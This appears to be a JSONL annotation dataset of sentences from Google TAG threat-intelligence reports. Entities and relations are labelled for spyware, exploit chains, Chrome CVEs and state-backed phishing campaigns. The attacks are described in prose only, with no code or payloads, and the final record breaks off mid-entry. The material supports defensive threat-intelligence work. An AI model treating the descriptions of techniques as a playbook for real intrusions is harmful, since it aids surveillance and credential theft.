{"id":4973,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.","entities":[{"id":51033,"label":"TIME","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4974,"text":"All three campaigns delivered one-time links mimicking URL shortener services to the targeted Android users via email.","entities":[],"relations":[],"Comments":[]} {"id":4975,"text":"The campaigns were limited — in each case, we assess the number of targets was in the tens of users.","entities":[],"relations":[],"Comments":[]} {"id":4976,"text":"Once clicked, the link redirected the target to an attacker-owned domain that delivered the exploits before redirecting the browser to a legitimate website.","entities":[],"relations":[],"Comments":[]} {"id":4977,"text":"If the link was not active, the user was redirected directly to a legitimate website.","entities":[],"relations":[],"Comments":[]} {"id":4978,"text":"We've seen this technique used against journalists and other unidentified targets, and alerted those users when possible.","entities":[],"relations":[],"Comments":[]} {"id":4979,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":51036,"label":"TIME","start_offset":150,"end_offset":163},{"id":51034,"label":"malware","start_offset":94,"end_offset":102},{"id":51035,"label":"identity","start_offset":136,"end_offset":146},{"id":15307,"label":"malware","start_offset":41,"end_offset":46}],"relations":[{"id":1034,"from_id":15307,"to_id":51034,"type":"drops"}],"Comments":[]} {"id":4980,"text":"ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.","entities":[{"id":51037,"label":"malware","start_offset":76,"end_offset":84},{"id":15312,"label":"malware","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":4981,"text":"These commands include recording audio, adding CA certificates, and hiding apps.","entities":[],"relations":[],"Comments":[]} {"id":4982,"text":"The first campaign, detected in August 2021, used Chrome on a Samsung Galaxy S21 and the web server immediately replied with a HTTP redirect (302) pointing to the following intent URL.","entities":[{"id":51038,"label":"TIME","start_offset":32,"end_offset":43},{"id":51039,"label":"SOFTWARE","start_offset":50,"end_offset":56}],"relations":[],"Comments":[]} {"id":4983,"text":"This URL abused a logic flaw and forced Chrome to load another URL in the Samsung Browser without user interaction or warnings.","entities":[{"id":51040,"label":"SOFTWARE","start_offset":40,"end_offset":46},{"id":51041,"label":"SOFTWARE","start_offset":74,"end_offset":89}],"relations":[],"Comments":[]} {"id":4984,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":51042,"label":"SOFTWARE","start_offset":117,"end_offset":135},{"id":51043,"label":"SOFTWARE","start_offset":192,"end_offset":207},{"id":51044,"label":"SOFTWARE","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} {"id":4985,"text":"We assess with high confidence this vulnerability was sold by an exploit broker and probably abused by more than one surveillance vendor.","entities":[],"relations":[],"Comments":[]} {"id":4986,"text":"More technical details about this vulnerability are available in this RCA by Maddie Stone.","entities":[{"id":51045,"label":"identity","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} {"id":4987,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":4988,"text":"In September 2021, TAG detected a campaign where the exploit chain was delivered to a fully up-to-date Samsung Galaxy S10 running the latest version of Chrome.","entities":[{"id":51046,"label":"TIME","start_offset":3,"end_offset":17},{"id":51047,"label":"identity","start_offset":19,"end_offset":22},{"id":51048,"label":"SOFTWARE","start_offset":152,"end_offset":158}],"relations":[],"Comments":[]} {"id":4989,"text":"We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.","entities":[{"id":51049,"label":"SOFTWARE","start_offset":44,"end_offset":58},{"id":51050,"label":"attack-pattern","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} {"id":4990,"text":"The sandbox escape was loaded directly as an ELF binary embedding libchrome.so and a custom libmojo_bridge.so was used to ease the communication with the Mojo IPCs.","entities":[],"relations":[],"Comments":[]} {"id":4991,"text":"This means the renderer exploit did not enable MojoJS bindings like we often see in public exploits.","entities":[],"relations":[],"Comments":[]} {"id":4992,"text":"Analysis of the exploit identified two different vulnerabilities in Chrome: After escaping the sandbox, the exploit downloaded another exploit in \/data\/data\/com.android.chrome\/p.so to elevate privileges and install the implant.","entities":[{"id":51051,"label":"SOFTWARE","start_offset":68,"end_offset":74},{"id":51052,"label":"FILEPATH","start_offset":146,"end_offset":180}],"relations":[],"Comments":[]} {"id":4993,"text":"We haven’t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} {"id":4994,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":4995,"text":"In October 2021, we detected a full chain exploit from an up-to-date Samsung phone running the latest version of Chrome.","entities":[{"id":51053,"label":"TIME","start_offset":3,"end_offset":15},{"id":51054,"label":"SOFTWARE","start_offset":113,"end_offset":119}],"relations":[],"Comments":[]} {"id":4996,"text":"The chain included two 0-day exploits: Of note, CVE-2021-1048 was fixed in the Linux kernel in September 2020, over a year before this campaign.","entities":[{"id":51055,"label":"vulnerability","start_offset":48,"end_offset":61},{"id":51056,"label":"TIME","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} {"id":4997,"text":"The commit was not flagged as a security issue and therefore the patch was not backported in most Android kernels.","entities":[],"relations":[],"Comments":[]} {"id":4998,"text":"At the time of the exploit, all Samsung kernels were vulnerable; LTS kernels running on Pixel phones were recent enough and included the fix for this bug.","entities":[],"relations":[],"Comments":[]} {"id":4999,"text":"Unfortunately, this is not the first time we have seen this happen with exploits in the wild; the 2019 Bad Binder vulnerability is another example.","entities":[{"id":51057,"label":"TIME","start_offset":98,"end_offset":102},{"id":51058,"label":"vulnerability","start_offset":103,"end_offset":127}],"relations":[],"Comments":[]} {"id":5000,"text":"In both cases, the fix was not flagged as a security issue and thus not backported to all (or any) Android kernels.","entities":[{"id":51059,"label":"SOFTWARE","start_offset":99,"end_offset":106}],"relations":[],"Comments":[]} {"id":5001,"text":"Attackers are actively looking for and profiting from such slowly-fixed vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":5002,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":5003,"text":"We’d be remiss if we did not acknowledge the quick response and patching of these vulnerabilities by Google’s Chrome and Android teams.","entities":[{"id":51060,"label":"identity","start_offset":101,"end_offset":134}],"relations":[],"Comments":[]} {"id":5004,"text":"We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.","entities":[],"relations":[],"Comments":[]} {"id":5005,"text":"TAG continues to track more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.","entities":[{"id":51061,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":5006,"text":"We remain committed to updating the community as we uncover these campaigns.","entities":[],"relations":[],"Comments":[]} {"id":5007,"text":"Tackling the harmful practices of the commercial surveillance industry will require a robust, comprehensive approach that includes cooperation among threat intelligence teams, network defenders, academic researchers and technology platforms.","entities":[],"relations":[],"Comments":[]} {"id":5008,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[],"relations":[],"Comments":[]} {"id":5009,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[{"id":51062,"label":"TIME","start_offset":9,"end_offset":17}],"relations":[],"Comments":[]} {"id":5010,"text":"Google’s Threat Analysis Group (TAG) has been closely monitoring the cybersecurity activity in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":51063,"label":"identity","start_offset":0,"end_offset":36},{"id":51064,"label":"location","start_offset":95,"end_offset":109},{"id":51065,"label":"location","start_offset":136,"end_offset":143}],"relations":[],"Comments":[]} {"id":5011,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51066,"label":"identity","start_offset":23,"end_offset":26},{"id":51067,"label":"attack-pattern","start_offset":106,"end_offset":122}],"relations":[],"Comments":[]} {"id":5012,"text":"Similar to other reports, we have also observed threat actors increasingly target critical infrastructure entities including oil and gas, telecommunications and manufacturing.","entities":[],"relations":[],"Comments":[]} {"id":5014,"text":"Financially motivated and criminal actors are also using current events as a means for targeting users.","entities":[],"relations":[],"Comments":[]} {"id":5015,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[{"id":51073,"label":"identity","start_offset":132,"end_offset":135}],"relations":[],"Comments":[]} {"id":5016,"text":"We promptly identify and remove any such content but have not observed any significant shifts from the normal levels of activity that occur in the region.","entities":[],"relations":[],"Comments":[]} {"id":5017,"text":"Here is a deeper look at the campaign activity TAG has observed and the actions the team has taken to protect our users over the past few weeks: APT28 or Fancy Bear, a threat actor attributed to Russia GRU, was observed targeting users in Ukraine with a new variant of malware.","entities":[{"id":51078,"label":"location","start_offset":239,"end_offset":246},{"id":51074,"label":"identity","start_offset":47,"end_offset":50},{"id":51075,"label":"threat-actor","start_offset":145,"end_offset":150},{"id":51076,"label":"threat-actor","start_offset":154,"end_offset":164},{"id":51077,"label":"identity","start_offset":195,"end_offset":205}],"relations":[{"id":1035,"from_id":51076,"to_id":51075,"type":"duplicate-of"},{"id":1036,"from_id":51075,"to_id":51077,"type":"attributed-to"},{"id":1037,"from_id":51075,"to_id":51078,"type":"targets"}],"Comments":[]} {"id":5018,"text":"The malware, distributed via email attachments inside of password protected zip files (ua_report.zip), is a .Net executable that when executed steals cookies and saved passwords from Chrome, Edge and Firefox browsers.","entities":[{"id":51079,"label":"FILEPATH","start_offset":87,"end_offset":100},{"id":51082,"label":"SOFTWARE","start_offset":200,"end_offset":207},{"id":51083,"label":"SOFTWARE","start_offset":108,"end_offset":112},{"id":51080,"label":"SOFTWARE","start_offset":183,"end_offset":189},{"id":51081,"label":"SOFTWARE","start_offset":191,"end_offset":195}],"relations":[],"Comments":[]} {"id":5019,"text":"The data is then exfiltrated via email to a compromised email account.","entities":[],"relations":[],"Comments":[]} {"id":5020,"text":"Malware samples:","entities":[],"relations":[],"Comments":[]} {"id":5021,"text":"TAG would like to thank the Yahoo! Paranoids Advanced Cyber Threats Team for their collaboration in this investigation.","entities":[{"id":51084,"label":"identity","start_offset":0,"end_offset":3},{"id":51085,"label":"identity","start_offset":28,"end_offset":72}],"relations":[],"Comments":[]} {"id":5022,"text":"Turla, a group TAG attributes to Russia FSB, continues to run campaigns against the Baltics, targeting defense and cybersecurity organizations in the region.","entities":[{"id":51087,"label":"identity","start_offset":15,"end_offset":18},{"id":51086,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":51088,"label":"identity","start_offset":33,"end_offset":43},{"id":51089,"label":"location","start_offset":84,"end_offset":91}],"relations":[{"id":1038,"from_id":51086,"to_id":51088,"type":"attributed-to"},{"id":1039,"from_id":51086,"to_id":51089,"type":"targets"}],"Comments":[]} {"id":5023,"text":"Similar to recently observed activity, these campaigns were sent via email and contained a unique link per target that led to a DOCX file hosted on attacker controlled infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":5024,"text":"When opened, the DOCX file would attempt to download a unique PNG file from the same attacker controlled domain.","entities":[],"relations":[],"Comments":[]} {"id":5025,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":51091,"label":"threat-actor","start_offset":33,"end_offset":42},{"id":51092,"label":"threat-actor","start_offset":98,"end_offset":106},{"id":51093,"label":"SOFTWARE","start_offset":125,"end_offset":130},{"id":51094,"label":"identity","start_offset":191,"end_offset":197},{"id":51090,"label":"threat-actor","start_offset":18,"end_offset":23}],"relations":[{"id":1040,"from_id":51092,"to_id":51091,"type":"duplicate-of"},{"id":1041,"from_id":51091,"to_id":51093,"type":"uses"},{"id":1042,"from_id":51091,"to_id":51094,"type":"targets"}],"Comments":[]} {"id":5026,"text":"The targets include government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[],"relations":[],"Comments":[]} {"id":5027,"text":"The group's tactics, techniques and procedures (TTPs) for these campaigns have shifted slightly from including phishing links directly in the email, to also linking to PDFs and\/or DOCs hosted on Google Drive and Microsoft One Drive.","entities":[{"id":51096,"label":"SOFTWARE","start_offset":212,"end_offset":231},{"id":51095,"label":"SOFTWARE","start_offset":195,"end_offset":207}],"relations":[],"Comments":[]} {"id":5028,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[],"relations":[],"Comments":[]} {"id":5029,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":51097,"label":"SOFTWARE","start_offset":49,"end_offset":69}],"relations":[],"Comments":[]} {"id":5030,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, has remained active during the course of the war and recently resumed targeting of Gmail accounts via credential phishing.","entities":[{"id":51098,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":51100,"label":"location","start_offset":72,"end_offset":82},{"id":51101,"label":"SOFTWARE","start_offset":180,"end_offset":185},{"id":51102,"label":"attack-pattern","start_offset":199,"end_offset":218},{"id":51099,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1043,"from_id":51099,"to_id":51100,"type":"located-at"},{"id":1044,"from_id":51099,"to_id":51101,"type":"uses"},{"id":1045,"from_id":51099,"to_id":51102,"type":"uses"}],"Comments":[]} {"id":5032,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} {"id":5033,"text":"There were no accounts compromised from this campaign and Google will alert all targeted users of these attempts through our monthly government-backed attacker warnings.","entities":[{"id":51104,"label":"identity","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} {"id":5034,"text":"Both pages from this campaign are shown below.","entities":[],"relations":[],"Comments":[]} {"id":5035,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook users.","entities":[{"id":51105,"label":"TIME","start_offset":3,"end_offset":12},{"id":51106,"label":"identity","start_offset":14,"end_offset":17},{"id":51107,"label":"threat-actor","start_offset":29,"end_offset":40},{"id":51108,"label":"SOFTWARE","start_offset":80,"end_offset":88}],"relations":[],"Comments":[]} {"id":5036,"text":"The targets, primarily located in Lithuania, were sent links to attacker controlled domains from a domain spoofing the Facebook security team.","entities":[{"id":51110,"label":"identity","start_offset":119,"end_offset":141},{"id":51109,"label":"location","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} {"id":5037,"text":"Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.","entities":[{"id":51116,"label":"location","start_offset":232,"end_offset":238},{"id":51117,"label":"location","start_offset":243,"end_offset":255},{"id":51113,"label":"identity","start_offset":93,"end_offset":96},{"id":51115,"label":"location","start_offset":223,"end_offset":230},{"id":51112,"label":"threat-actor","start_offset":70,"end_offset":83},{"id":51111,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51114,"label":"identity","start_offset":111,"end_offset":126}],"relations":[{"id":1046,"from_id":51112,"to_id":51114,"type":"attributed-to"},{"id":1047,"from_id":51112,"to_id":51115,"type":"targets"},{"id":1048,"from_id":51112,"to_id":51116,"type":"targets"},{"id":1049,"from_id":51112,"to_id":51117,"type":"targets"}],"Comments":[]} {"id":5038,"text":"In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs.","entities":[{"id":51119,"label":"identity","start_offset":106,"end_offset":133},{"id":51118,"label":"location","start_offset":3,"end_offset":9}],"relations":[],"Comments":[]} {"id":5039,"text":"Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.","entities":[{"id":51120,"label":"identity","start_offset":20,"end_offset":23},{"id":51122,"label":"identity","start_offset":129,"end_offset":154},{"id":51121,"label":"identity","start_offset":77,"end_offset":122}],"relations":[],"Comments":[]} {"id":5040,"text":" Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[{"id":51123,"label":"SOFTWARE","start_offset":67,"end_offset":80}],"relations":[],"Comments":[]} {"id":5041,"text":"We also send all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51125,"label":"SOFTWARE","start_offset":36,"end_offset":45},{"id":51124,"label":"SOFTWARE","start_offset":26,"end_offset":31}],"relations":[],"Comments":[]} {"id":5042,"text":"We encourage any potential targets to enable Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} {"id":5043,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[],"relations":[],"Comments":[]} {"id":5044,"text":"We’ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} {"id":5046,"text":"In early March, Google’s Threat Analysis Group (TAG) published an update on the cyber activity it was tracking with regard to the war in Ukraine.","entities":[{"id":51129,"label":"identity","start_offset":16,"end_offset":52},{"id":51130,"label":"location","start_offset":137,"end_offset":144},{"id":51128,"label":"TIME","start_offset":3,"end_offset":14}],"relations":[],"Comments":[]} {"id":5047,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51131,"label":"identity","start_offset":23,"end_offset":26},{"id":51132,"label":"attack-pattern","start_offset":106,"end_offset":134}],"relations":[],"Comments":[]} {"id":5049,"text":"Financially motivated and criminal actors are also using current events as a means for targeting users.","entities":[],"relations":[],"Comments":[]} {"id":5051,"text":"TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.","entities":[{"id":51139,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":5052,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[{"id":51140,"label":"identity","start_offset":132,"end_offset":135}],"relations":[],"Comments":[]} {"id":5053,"text":"We promptly identify and remove any such content, but have not observed any significant shifts from the normal levels of activity that occur in the region.","entities":[],"relations":[],"Comments":[]} {"id":5054,"text":"Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.","entities":[{"id":51145,"label":"location","start_offset":220,"end_offset":227},{"id":51148,"label":"location","start_offset":253,"end_offset":261},{"id":51149,"label":"identity","start_offset":179,"end_offset":216},{"id":51141,"label":"identity","start_offset":47,"end_offset":50},{"id":51142,"label":"threat-actor","start_offset":89,"end_offset":102},{"id":51143,"label":"identity","start_offset":112,"end_offset":115},{"id":51144,"label":"identity","start_offset":130,"end_offset":145},{"id":51146,"label":"location","start_offset":229,"end_offset":235},{"id":51147,"label":"location","start_offset":237,"end_offset":247}],"relations":[{"id":1050,"from_id":51142,"to_id":51144,"type":"attributed-to"},{"id":1051,"from_id":51142,"to_id":51149,"type":"targets"},{"id":1052,"from_id":51142,"to_id":51145,"type":"targets"},{"id":1053,"from_id":51142,"to_id":51146,"type":"targets"},{"id":1054,"from_id":51142,"to_id":51147,"type":"targets"},{"id":1055,"from_id":51142,"to_id":51148,"type":"targets"}],"Comments":[]} {"id":5055,"text":"While this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations.","entities":[{"id":51150,"label":"identity","start_offset":44,"end_offset":50}],"relations":[],"Comments":[]} {"id":5056,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":51151,"label":"threat-actor","start_offset":30,"end_offset":43},{"id":51152,"label":"threat-actor","start_offset":55,"end_offset":64},{"id":51153,"label":"location","start_offset":68,"end_offset":75},{"id":51154,"label":"threat-actor","start_offset":120,"end_offset":127},{"id":51155,"label":"attack-pattern","start_offset":142,"end_offset":171},{"id":51157,"label":"identity","start_offset":226,"end_offset":255},{"id":51158,"label":"identity","start_offset":263,"end_offset":295},{"id":51156,"label":"identity","start_offset":191,"end_offset":220}],"relations":[{"id":1056,"from_id":51152,"to_id":51153,"type":"located-at"},{"id":1057,"from_id":51154,"to_id":51152,"type":"duplicate-of"},{"id":1058,"from_id":51152,"to_id":51155,"type":"uses"},{"id":1059,"from_id":51152,"to_id":51156,"type":"targets"},{"id":1060,"from_id":51152,"to_id":51157,"type":"targets"},{"id":1061,"from_id":51152,"to_id":51158,"type":"targets"}],"Comments":[]} {"id":5057,"text":"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.","entities":[{"id":51162,"label":"identity","start_offset":142,"end_offset":167},{"id":51159,"label":"identity","start_offset":29,"end_offset":32},{"id":51160,"label":"threat-actor","start_offset":46,"end_offset":55},{"id":51161,"label":"identity","start_offset":101,"end_offset":127}],"relations":[{"id":1062,"from_id":51160,"to_id":51161,"type":"targets"},{"id":1063,"from_id":51160,"to_id":51162,"type":"targets"}],"Comments":[]} {"id":5058,"text":"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.","entities":[{"id":51163,"label":"SOFTWARE","start_offset":46,"end_offset":51}],"relations":[],"Comments":[]} {"id":5059,"text":"We have not observed any Gmail accounts successfully compromised during these campaigns.","entities":[{"id":51164,"label":"SOFTWARE","start_offset":25,"end_offset":30}],"relations":[],"Comments":[]} {"id":5060,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":51165,"label":"location","start_offset":72,"end_offset":82},{"id":51166,"label":"campaign","start_offset":145,"end_offset":174},{"id":15621,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":15623,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1064,"from_id":15623,"to_id":51165,"type":"located-at"},{"id":1065,"from_id":15623,"to_id":51166,"type":"uses"}],"Comments":[]} {"id":5061,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":51167,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} {"id":5062,"text":"While TAG has previously observed this technique being used by multiple government-backed actors, the media picked up on this blog post, publishing several stories highlighting this phishing capability.","entities":[{"id":51168,"label":"identity","start_offset":6,"end_offset":9}],"relations":[],"Comments":[]} {"id":5063,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":51170,"label":"attack-pattern","start_offset":111,"end_offset":173},{"id":51169,"label":"threat-actor","start_offset":0,"end_offset":11}],"relations":[{"id":1066,"from_id":51169,"to_id":51170,"type":"uses"}],"Comments":[]} {"id":5064,"text":"The new technique, displayed below, draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site.","entities":[{"id":51171,"label":"DOMAIN","start_offset":81,"end_offset":94}],"relations":[],"Comments":[]} {"id":5065,"text":"Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.","entities":[],"relations":[],"Comments":[]} {"id":5066,"text":"Recently observed Ghostwriter credential phishing domains:","entities":[{"id":51172,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51173,"label":"attack-pattern","start_offset":30,"end_offset":49}],"relations":[{"id":1067,"from_id":51172,"to_id":51173,"type":"uses"}],"Comments":[]} {"id":5067,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[],"relations":[],"Comments":[]} {"id":5068,"text":"We’ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} {"id":5070,"text":"On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609.","entities":[{"id":51176,"label":"TIME","start_offset":3,"end_offset":14},{"id":51177,"label":"identity","start_offset":16,"end_offset":37},{"id":51178,"label":"threat-actor","start_offset":62,"end_offset":108},{"id":51179,"label":"vulnerability","start_offset":122,"end_offset":157},{"id":51180,"label":"vulnerability","start_offset":169,"end_offset":182},{"id":51181,"label":"SOFTWARE","start_offset":161,"end_offset":167}],"relations":[{"id":1068,"from_id":51179,"to_id":51180,"type":"duplicate-of"},{"id":1069,"from_id":51181,"to_id":51180,"type":"has"},{"id":1070,"from_id":51178,"to_id":51180,"type":"exploits"}],"Comments":[]} {"id":5071,"text":"These groups' activity has been publicly tracked as Operation Dream Job and Operation AppleJeus.","entities":[{"id":51183,"label":"campaign","start_offset":76,"end_offset":95},{"id":51182,"label":"campaign","start_offset":52,"end_offset":71}],"relations":[],"Comments":[]} {"id":5073,"text":"However, other organizations and countries may have been targeted.","entities":[],"relations":[],"Comments":[]} {"id":5074,"text":"One of the campaigns has direct infrastructure overlap with a campaign targeting security researchers which we reported on last year.","entities":[],"relations":[],"Comments":[]} {"id":5075,"text":"The exploit was patched on February 14, 2022.","entities":[{"id":51185,"label":"TIME","start_offset":27,"end_offset":44}],"relations":[],"Comments":[]} {"id":5076,"text":"The earliest evidence we have of this exploit kit being actively deployed is January 4, 2022.","entities":[{"id":51186,"label":"TIME","start_offset":77,"end_offset":92}],"relations":[],"Comments":[]} {"id":5077,"text":"We suspect that these groups work for the same entity with a shared supply chain, hence the use of the same exploit kit, but each operate with a different mission set and deploy different techniques.","entities":[],"relations":[],"Comments":[]} {"id":5078,"text":"It is possible that other North Korean government-backed attackers have access to the same exploit kit.","entities":[{"id":51187,"label":"threat-actor","start_offset":26,"end_offset":66}],"relations":[],"Comments":[]} {"id":5079,"text":"In this blog, we will walk through the observed tactics, techniques and procedures, share relevant IOCs and analyze the exploit kit used by the attackers.","entities":[],"relations":[],"Comments":[]} {"id":5080,"text":"In line with our current disclosure policy, we are providing these details 30 days after the patch release.","entities":[],"relations":[],"Comments":[]} {"id":5081,"text":"The campaign, consistent with Operation Dream Job, targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors.","entities":[{"id":51188,"label":"campaign","start_offset":30,"end_offset":49}],"relations":[],"Comments":[]} {"id":5082,"text":"The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities.","entities":[{"id":51189,"label":"identity","start_offset":64,"end_offset":70},{"id":51191,"label":"identity","start_offset":83,"end_offset":89},{"id":51190,"label":"identity","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":5083,"text":"The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.","entities":[{"id":51193,"label":"identity","start_offset":84,"end_offset":96},{"id":51192,"label":"identity","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} {"id":5084,"text":"Victims who clicked on the links would be served a hidden iframe that would trigger the exploit kit.","entities":[],"relations":[],"Comments":[]} {"id":5085,"text":"Attacker-Owned Fake Job Domains: Exploitation URLs:","entities":[],"relations":[],"Comments":[]} {"id":5086,"text":"Another North Korean group, whose activity has been publicly tracked as Operation AppleJeus, targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit.","entities":[{"id":51194,"label":"location","start_offset":8,"end_offset":20},{"id":51195,"label":"campaign","start_offset":72,"end_offset":91}],"relations":[],"Comments":[]} {"id":5087,"text":"This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors.","entities":[],"relations":[],"Comments":[]} {"id":5088,"text":"In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.","entities":[],"relations":[],"Comments":[]} {"id":5089,"text":"Attacker-Owned Websites: Compromised Websites (Feb 7 - Feb 9): Exploitation URLs:","entities":[],"relations":[],"Comments":[]} {"id":5090,"text":"The attackers made use of an exploit kit that contained multiple stages and components in order to exploit targeted users.","entities":[],"relations":[],"Comments":[]} {"id":5091,"text":"The attackers placed links to the exploit kit within hidden iframes, which they embedded on both websites they owned as well as some websites they compromised.","entities":[],"relations":[],"Comments":[]} {"id":5092,"text":"The kit initially serves some heavily obfuscated javascript used to fingerprint the target system.","entities":[],"relations":[],"Comments":[]} {"id":5093,"text":"This script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server.","entities":[],"relations":[],"Comments":[]} {"id":5094,"text":"If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript.","entities":[{"id":51196,"label":"SOFTWARE","start_offset":72,"end_offset":78},{"id":51197,"label":"attack-pattern","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} {"id":5095,"text":"If the RCE was successful, the javascript would request the next stage referenced within the script as “SBX”, a common acronym for Sandbox Escape.","entities":[{"id":51198,"label":"attack-pattern","start_offset":7,"end_offset":10},{"id":51199,"label":"attack-pattern","start_offset":131,"end_offset":145}],"relations":[],"Comments":[]} {"id":5096,"text":"We unfortunately were unable to recover any of the stages that followed the initial RCE.","entities":[{"id":51200,"label":"attack-pattern","start_offset":84,"end_offset":87}],"relations":[],"Comments":[]} {"id":5097,"text":"Careful to protect their exploits, the attackers deployed multiple safeguards to make it difficult for security teams to recover any of the stages.","entities":[],"relations":[],"Comments":[]} {"id":5098,"text":"These safeguards included: Although we recovered a Chrome RCE, we also found evidence where the attackers specifically checked for visitors using Safari on MacOS or Firefox (on any OS), and directed them to specific links on known exploitation servers.","entities":[{"id":51202,"label":"attack-pattern","start_offset":58,"end_offset":61},{"id":51201,"label":"SOFTWARE","start_offset":51,"end_offset":57},{"id":51203,"label":"SOFTWARE","start_offset":146,"end_offset":152},{"id":51204,"label":"SOFTWARE","start_offset":156,"end_offset":161},{"id":51205,"label":"SOFTWARE","start_offset":165,"end_offset":172}],"relations":[],"Comments":[]} {"id":5099,"text":"We did not recover any responses from those URLs.","entities":[],"relations":[],"Comments":[]} {"id":5100,"text":"Example Exploit 